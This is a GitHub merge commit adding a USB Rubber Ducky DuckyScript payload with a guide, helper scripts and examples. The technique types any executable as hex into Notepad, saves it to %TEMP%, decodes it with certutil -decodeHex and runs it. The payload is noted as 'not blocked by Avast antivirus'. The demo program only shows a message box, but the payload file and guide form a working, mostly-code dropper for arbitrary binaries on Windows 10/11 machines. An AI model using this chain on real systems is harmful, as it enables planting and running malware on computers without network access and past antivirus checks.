Merge pull request #347 from aleff-github/patch-64

Install And Run Any Arbitrary Executable - No Internet And Root Needed
pull/393/merge
Dallas Winger 2024-01-08 02:24:00 -05:00 committed by GitHub
commit bf2dfb7c17
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
6 changed files with 270 additions and 0 deletions

View File

@ -0,0 +1,125 @@
# Install And Run Any Arbitrary Executable - No Internet And Root Needed
Through this guide you will be able to create executable programs that can be installed via DuckyScript in such a way as to avoid using the Internet altogether. This type of installation can lead to serious damage to machines so do it only if you are fully aware and sure of what you are doing, in this example you will already find the code in hexadecimal but if you want to be sure recompile the executable following the following guide.
Executables have been removed for security reasons.
**Category**: Execution
# Guide to Creating an Executable Program using Python
## Introduction
This guide provides detailed instructions on how to use Python to create an executable program, generate hexadecimal code, and automate the execution of the application trough DuckyScript. Practical example in assets directory.
## Creating the Python Program
To begin, create a Python program that performs the desired functionality. You can use any programming language of your choice, but for this guide, we'll be using Python.
```python
import ctypes
ctypes.windll.user32.MessageBoxW(None, "Hello Hak5!", 'Info', 0x10 | 0x1)
```
## Creating the Executable using PyInstaller
Once the Python program is ready, we can use PyInstaller to create an executable file. PyInstaller converts the Python program into a standalone executable that can be run on any compatible system without requiring Python to be installed.
Install PyInstaller using the following command:
```powershell
pip install pyinstaller
```
To create the executable, run the following command in the terminal:
```powershell
pyinstaller --onefile full/path/to/the/file/example.py
```
Replace `example.py` with the filename of your Python script. The `--onefile` flag ensures that the output is a single executable file. Remember that the executable file can be found within the path `dist/example.exe`.
## Generating Hexadecimal Code
Next, we'll generate the hexadecimal code from the executable file. This step is necessary if you intend to automate the execution of the program.
To generate the `hexadecimal` code, you can use various methods or libraries. In this case I decided to create another program in Python capable of doing this conversion, the partial code is as follows but you can find the entire file in the assets folder.
```python
# Rest of the code...
with open(filename, 'rb') as file:
binary_data = file.read()
hex_code = binascii.hexlify(binary_data).decode()
# ...
```
## Creating a DuckyScript to Automate Execution
To create the payload in DuckyScript you simply add the hexadecimal code inside a STRING command immediately after opening the notepad.
```duckyscript
DEFINE #HEX_CODE <hexadecimal_code>
DELAY 500
GUI r
DELAY 500
STRING notepad.exe
ENTER
DELAY 500
STRING #HEX_CODE
DELAY 2000
ALT F
DELAY 1000
STRING S
DELAY 1000
ALTSTRING "%TEMP%\script.hex"
```
Replace `<hexadecimal_code>` with the actual hexadecimal code generated in the previous step. I used a combo ALT F and STRING S for save the file using `"%TEMP%\script.hex"` that save it in a `TEMP` directory
## Decoding Hexadecimal Code and Executing the Program
Now, we need to decode the hexadecimal code and execute the program. We can use the `certutil` command to accomplish this.
Once saved the file with a hex extension, run the following command in the Command Prompt:
```powershell
certutil -f -decodeHex "%TEMP%\script.hex" "%TEMP%\script.exe"
```
Replace `script.exe` with the desired output filename for the decoded program.
Finally, run the executable on the computer, or any other compatible device, to open start execution of the program.
These are the steps required to create an executable program with Python, generate the hexadecimal code, and automate its execution. Feel free to modify the instructions to suit your specific needs or programming language preferences.
Happy Hacking!
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
</a>
<br>Instagram
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Discord
</td>
</tr>
</table>
</div>

View File

@ -0,0 +1,77 @@
# Example
Executables have been removed for security reasons.
## File list
- Python code: `example.py`
- Convert to hex script: `convert_to_hex.py`
- Executable file compiled using pyinstaller: `dist/example.exe`
- Hexadecimal code output: `example.hex`
- File compiled from hex code using certutil: `example.exe`
## Procedure
- This Python code create a Windows popup.
```python
import ctypes
ctypes.windll.user32.MessageBoxW(None, "Hello Hak5!", 'Info', 0x10 | 0x1)
```
- Create the executable
```powershell
pyinstaller --onefile C:/Users/Aleff/Documents/Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/example.py
```
- Create the hex code
```python
import binascii
def convert_to_hex(filename, output_file):
with open(filename, 'rb') as file:
binary_data = file.read()
hex_code = binascii.hexlify(binary_data).decode()
with open(output_file, 'w') as output:
output.write(hex_code)
# Esempio di utilizzo
exe_filename = 'C:/Users/Aleff/Documents/Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/dist/example.exe'
output_filename = 'C:/Users/Aleff/Documents/Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/example.hex'
convert_to_hex(exe_filename, output_filename)
```
- Create the DuckyScript payload
```duckyscript
GUI r
DELAY 1000
STRINGLN notepad.exe
DELAY 2000
STRING #HEX_CODE
DELAY 2000
ALT F
DELAY 1000
STRING S
DELAY 1000
STRINGLN "%TEMP%\example.hex"
DELAY 1000
ENTER
DELAY 1000
ALT F4
DELAY 2000
GUI r
DELAY 500
STRINGLN certutil -f -decodeHex "%TEMP%\example.hex" "%TEMP%\example.exe"
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 250
STRINGLN "%TEMP%\pranhex.exe"
```

View File

@ -0,0 +1,15 @@
import binascii
def convert_to_hex(filename, output_file):
with open(filename, 'rb') as file:
binary_data = file.read()
hex_code = binascii.hexlify(binary_data).decode()
with open(output_file, 'w') as output:
output.write(hex_code)
# Esempio di utilizzo
exe_filename = 'C:/Users/Aleff/Documents/GitHub/tmp/TODO Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/dist/example.exe'
output_filename = 'C:/Users/Aleff/Documents/GitHub/tmp/TODO Install_And_Run_Any_Arbitrary_Executable-No_Internet_Needed/assets/example.txt'
convert_to_hex(exe_filename, output_filename)

View File

@ -0,0 +1 @@
here should be present the hex content

View File

@ -0,0 +1,3 @@
import ctypes
ctypes.windll.user32.MessageBoxW(None, "Hello Hak5!", 'Info', 0x10 | 0x1)

View File

@ -0,0 +1,49 @@
REM ###########################################################################################
REM # |
REM # Title : Install And Run Any Arbitrary Executable - No Internet And Root Needed |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Execution |
REM # Target : Windows 10/11 |
REM # |
REM ###########################################################################################
REM Requirements:
REM - Nothing
REM Define here your hexadecimal code
DEFINE #HEX_CODE example
REM Note:
REM - Tested on Windows 11
REM - Running checked but not blocked by Avast antivirus
GUI r
DELAY 1000
STRINGLN notepad.exe
DELAY 2000
STRING #HEX_CODE
DELAY 2000
ALT F
DELAY 1000
STRING S
DELAY 1000
STRINGLN "%TEMP%\example.hex"
DELAY 1000
ENTER
DELAY 1000
ALT F4
DELAY 2000
GUI r
DELAY 500
STRINGLN certutil -f -decodeHex "%TEMP%\example.hex" "%TEMP%\example.exe"
DELAY 1000
ENTER
DELAY 1000
GUI r
DELAY 250
STRINGLN "%TEMP%\example.exe"